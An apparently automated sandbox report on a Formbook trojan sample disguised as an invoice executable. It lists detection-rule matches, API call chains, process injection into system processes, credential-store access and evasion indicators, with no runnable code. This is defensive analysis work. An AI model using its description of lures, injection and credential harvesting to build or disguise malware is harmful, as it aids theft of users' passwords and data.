Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@7/4
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044AF6C GetLastError,FormatMessageW, 0_2_0044AF6C
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464EAE
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D619
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, 0_2_004755C4
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0047839D
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043305F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe File created: C:\Users\user\AppData\Local\Temp\niellists Jump to behavior
Source: Revised Invoice H000127896.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: replace.exe, 00000005.00000002.3291550327.000000000260E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2707246168.00000000025E3000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2707349833.0000000002604000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002604000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.000000000262F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Revised Invoice H000127896.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe File read: C:\Users\user\Desktop\Revised Invoice H000127896.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Revised Invoice H000127896.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe" Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe" Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Revised Invoice H000127896.exe Static file information: File size 1379361 > 1048576
Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MUjPkRkjOWKkX.exe, 00000004.00000000.2443952915.000000000080E000.00000002.00000001.01000000.00000005.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3291334317.000000000080E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: Revised Invoice H000127896.exe Static PE information: real checksum: 0xa961f should be: 0x155d3a
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418066 push ecx; rep ret 2_2_0041808F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414012 push es; iretd 2_2_00414075
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401A71 pushfd ; retf 2_2_00401ABE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004032C0 push eax; ret 2_2_004032C2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004162CC pushad ; ret 2_2_004162CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417B73 push ecx; ret 2_2_00417B74
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417C09 pushfd ; retf 2_2_00417C0C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404D68 push es; retf 2_2_00404D6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413DC3 push edx; retf 2_2_00413DFD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414632 push es; iretd 2_2_00414633
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413E3A push edx; retf 2_2_00413DFD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00415723 push edx; ret 2_2_004157E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413FC9 push es; iretd 2_2_00414075
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413FC9 push FFFFFFB3h; retn E51Dh 2_2_004140F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404FCF push 001D5E1Fh; retf 2_2_00404FD4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401F9C push esp; ret 2_2_00401FAE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0380225F pushad ; ret 2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038027FA pushad ; ret 2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx 2_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0380283D push eax; iretd 2_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03801368 push eax; iretd 2_2_03801369
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D4C340 push ecx; iretd 4_2_03D4C34E
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D5CAE7 pushfd ; retf 4_2_03D5CAEA
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D5CA51 push ecx; ret 4_2_03D5CA52
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D5B1AA pushad ; ret 4_2_03D5B1AB
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D5CF44 push ecx; rep ret 4_2_03D5CF6D
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D58F3F push es; iretd 4_2_03D58F53
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D5A6C5 push ebx; iretd 4_2_03D5A6C9
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D49EAD push 001D5E1Fh; retf 4_2_03D49EB2
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D5A601 push edx; ret 4_2_03D5A6C4
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe API/Special instruction interceptor: Address: 40A6EA4
Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\replace.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0387096E rdtsc 2_2_0387096E
Source: C:\Windows\SysWOW64\replace.exe Window / User API: threadDelayed 4373 Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Window / User API: threadDelayed 5600 Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe API coverage: 3.7 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\replace.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\replace.exe TID: 3176 Thread sleep count: 4373 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 3176 Thread sleep time: -8746000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 3176 Thread sleep count: 5600 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 3176 Thread sleep time: -11200000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0213C240 FindFirstFileW,FindNextFileW,FindClose, 5_2_0213C240
